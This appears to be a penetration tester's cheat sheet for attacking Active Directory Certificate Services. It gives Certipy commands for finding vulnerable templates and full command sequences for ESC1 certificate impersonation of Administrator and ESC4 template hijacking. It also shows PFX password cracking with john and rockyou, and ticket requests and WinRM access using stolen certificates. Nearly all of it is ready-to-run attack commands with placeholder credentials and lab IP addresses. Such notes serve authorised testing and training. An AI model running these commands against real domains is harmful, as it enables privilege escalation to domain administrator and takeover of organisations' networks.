ADCS

Enumeration

https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html

Certipy can list vulnerable ADCS templates for given user credentials.
certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -vulnerable -stdout

If it doesn’t return vulns, you can review each template to see other users/groups you may want to leverage
certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -stdout

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation

Usage

How to use certificate // PFX file
NetExec support PFX files
nxc smb dc01.domain.htb -u administrator --pfx-cert administrator.pfx -x whoami

# Crack password if any
pfx2john.py legacyy_dev_auth.pfx > hashpfx
/opt/john/run/john hashpfx -wordlist=/usr/share/wordlists/rockyou.txt

# Save PFX without protection
certipy cert -export -pfx protected.pfx -password "password" -out unprotected.pfx

# Request TGT (then pass the ticket)
certipy auth -pfx unprotected.pfx -dc-ip 1.2.3.4 -domain 'domain.local' -username 'Administrator'

# OR...
# Extract cert and key from pfx
certipy cert -pfx unprotected.pfx -nokey -out user.crt
certipy cert -pfx unprotected.pfx -nocert -out user.key

# Use cert and key to connect with winrm
# https://gitlab.com/charles.gargasson/wintools/-/blob/main/winrmcert.rb
ruby winrmcert.rb --ip 10.129.227.113 --cert user.crt --key user.key

ESC1

ESC1 - Misconfigured Certificate Templates
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication

You need to check if the template allow impersonation (“Enrollee Supplies Subject” True)
Then check if you are into one of enrollment rights groups.
If you meet the requirements, generate a pfx certificate using the vulnerable template

DC_IP="1.2.3.4"
DOMAIN="domain.com"
CANAME="theCAname"
TEMPLATE="VulnerableTemplate"
IMPERSONATE="Administrator"
UNPRIVILEGED_USER="beepboop"
UNPRIVILEGED_USER_PASS='potate'
certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -ca "$CANAME" -template "$TEMPLATE" -dc-ip $DC_IP -upn "$IMPERSONATE@$DOMAIN" -dns-tcp -ns $DC_IP -debug

ESC4

ESC4 - Vulnerable Certificate Template Access Control
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc4-template-hijacking

You manipulate the template to make it vulnerable to ESC1
# Modify template (and backup the old one)
certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -save-old

# Exploit ESC1, retrieve impersonated user certificate
certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -ca "$CANAME" -upn "$IMPERSONATE@$DOMAIN"

# Restore config
certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -configuration "${TEMPLATE}.json"